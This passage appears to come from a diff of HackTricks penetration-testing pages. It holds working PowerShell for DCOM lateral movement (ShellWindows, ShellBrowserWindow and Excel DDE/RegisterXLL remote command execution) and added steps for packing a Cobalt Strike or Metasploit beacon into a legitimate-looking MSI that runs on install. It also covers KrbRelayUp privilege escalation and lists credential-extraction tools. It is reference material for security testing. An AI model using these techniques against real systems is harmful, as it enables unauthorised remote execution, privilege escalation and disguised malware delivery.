$obj = [System.Activator]::CreateInstance($com)
```
![](https://enigma0x3.files.wordpress.com/2017/01/remote\_instantiation\_shellwindows.png?w=690\&h=354)
With the object instantiated on the remote host, we can interface with it and invoke any methods we want. The returned handle to the object reveals several methods and properties, none of which we can interact with. In order to achieve actual interaction with the remote host, we need to access the [WindowsShell.Item](https://msdn.microsoft.com/en-us/library/windows/desktop/bb773970\(v=vs.85\).aspx) method, which will give us back an object that represents the Windows shell window:
```
$item = $obj.Item()
```
![](https://enigma0x3.files.wordpress.com/2017/01/item\_instantiation.png?w=416\&h=465)
With a full handle on the Shell Window, we can now access all of the expected methods/properties that are exposed. After going through these methods, **`Document.Application.ShellExecute`** stood out. Be sure to follow the parameter requirements for the method, which are documented [here](https://msdn.microsoft.com/en-us/library/windows/desktop/gg537745\(v=vs.85\).aspx).
```powershell
$item.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "c:\windows\system32", $null, 0)
```
![](https://enigma0x3.files.wordpress.com/2017/01/shellwindows\_command\_execution.png?w=690\&h=426)
As you can see above, our command was executed on a remote host successfully.
### ShellBrowserWindow
This particular object does not exist on Windows 7, making its use for lateral movement a bit more limited than the “ShellWindows” object, which I tested on Win7-Win10 successfully.
Based on my enumeration of this object, it appears to effectively provide an interface into the Explorer window just as the previous object does. To instantiate this object, we need to get its CLSID. Similar to above, we can use OleView .NET:
![shellbrowser\_classid](https://enigma0x3.files.wordpress.com/2017/01/shellbrowser\_classid.png?w=428\&h=414)
Again, take note of the blank Launch Permission field:
![screen-shot-2017-01-23-at-4-13-52-pm](https://enigma0x3.files.wordpress.com/2017/01/screen-shot-2017-01-23-at-4-13-52-pm.png?w=399\&h=340)
With the CLSID, we can repeat the steps taken on the previous object to instantiate the object and call the same method:
```powershell
$com = [Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880", "<IP>")
$obj = [System.Activator]::CreateInstance($com)
$obj.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "C:\Windows\system32", $null, 0)
```
![](https://enigma0x3.files.wordpress.com/2017/01/shellbrowserwindow\_command\_execution.png?w=690\&h=441)
As you can see, the command successfully executed on the remote target.
Since this object interfaces directly with the Windows shell, we dont need to invoke the “ShellWindows.Item” method, as on the previous object.
While these two DCOM objects can be used to run shell commands on a remote host, there are plenty of other interesting methods that can be used to enumerate or tamper with a remote target. A few of these methods include:
* `Document.Application.ServiceStart()`
* `Document.Application.ServiceStop()`
* `Document.Application.IsServiceRunning()`
* `Document.Application.ShutDownWindows()`
* `Document.Application.GetSystemInformation()`
## ExcelDDE & RegisterXLL
In a similar way it's possible to move laterally abusing DCOM Excel objects, for more information read [https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom](https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom)
```powershell
# Chunk of code from https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1
## You can see here how to abuse excel for RCE
elseif ($Method -Match "DetectOffice") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$isx64 = [boolean]$obj.Application.ProductCode[21]
Write-Host $(If ($isx64) {"Office x64 detected"} Else {"Office x86 detected"})
}
elseif ($Method -Match "RegisterXLL") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$obj.Application.RegisterXLL("$DllPath")
}
elseif ($Method -Match "ExcelDDE") {
$Com = [Type]::GetTypeFromProgID("Excel.Application","$ComputerName")
$Obj = [System.Activator]::CreateInstance($Com)
$Obj.DisplayAlerts = $false
$Obj.DDEInitiate("cmd", "/c $Command")
}
```
## Tool
The Powershell script [**Invoke-DCOM.ps1**](https://github.com/EmpireProject/Empire/blob/master/data/module\_source/lateral\_movement/Invoke-DCOM.ps1) allows to easily invoke all the commented ways to execute code in other machines.
## References
* The first method was copied from [https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/), for more info follow the link
* The second section was copied from [https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/), for more info follow the link
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -187,10 +187,9 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
### Manual Windows remote execution with username and password
* [**PsExec**](psexec-and-winexec.md)
* [**SmbExec**](smbexec.md)
* [**WmicExec**](wmicexec.md)
* [**AtExec**](atexec.md)
{% content-ref url="../lateral-movement/" %}
[lateral-movement](../lateral-movement/)
{% endcontent-ref %}
## Extracting credentials from a Windows Host

View file

@ -214,9 +214,9 @@ You can exploit this vulnerability using the tool [**WSUSpicious**](https://gith
## KrbRelayUp
This is essentially a universal no-fix **local privilege escalation** in windows **domain** environments where **LDAP signing is not enforced,** where the **user has self rights** (to configure **RBCD**) and where the **user can create computers in the domain.**\
\*\*\*\*All the requirements \*\*\*\* are satisfied with **default settings**.
****All the **requirements** are satisfied with **default settings**.
Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)\*\*\*\*
Find the **exploit in** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
Even if the attack is For more information about the flow of the attack check [https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/](https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/)
@ -262,6 +262,21 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t
[create-msi-with-wix.md](create-msi-with-wix.md)
{% endcontent-ref %}
### Create MSI with Visual Studio
* **Generate** with Cobalt Strike or Metasploit a **new Windows EXE TCP payload** in `C:\privesc\beacon.exe`
* Open **Visual Studio**, select **Create a new project** and type "installer" into the search box. Select the **Setup Wizard** project and click **Next**.
* Give the project a name, like **AlwaysPrivesc**, use **`C:\privesc`** for the location, select **place solution and project in the same directory**, and click **Create**.
* Keep clicking **Next** until you get to step 3 of 4 (choose files to include). Click **Add** and select the Beacon payload you just generated. Then click **Finish**.
* Highlight the **AlwaysPrivesc** project in the **Solution Explorer** and in the **Properties**, change **TargetPlatform** from **x86** to **x64**.
* There are other properties you can change, such as the **Author** and **Manufacturer** which can make the installed app look more legitimate.
* Right-click the project and select **View > Custom Actions**.
* Right-click **Install** and select **Add Custom Action**.
* Double-click on **Application Folder**, select your **beacon.exe** file and click **OK**. This will ensure that the beacon payload is executed as soon as the installer is run.
* Under the **Custom Action Properties**, change **Run64Bit** to **True**.
* Finally, **build it**.
* If the warning `File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86'` is shown, make sure you set the platform to x64.
### MSI Installation
To execute the **installation** of the malicious `.msi` file in **background:**
@ -1481,6 +1496,7 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- Extracts credentials from lots of softwares (precompiled exe in github)**\
****[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- Port of PowerUp to C#**\
[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.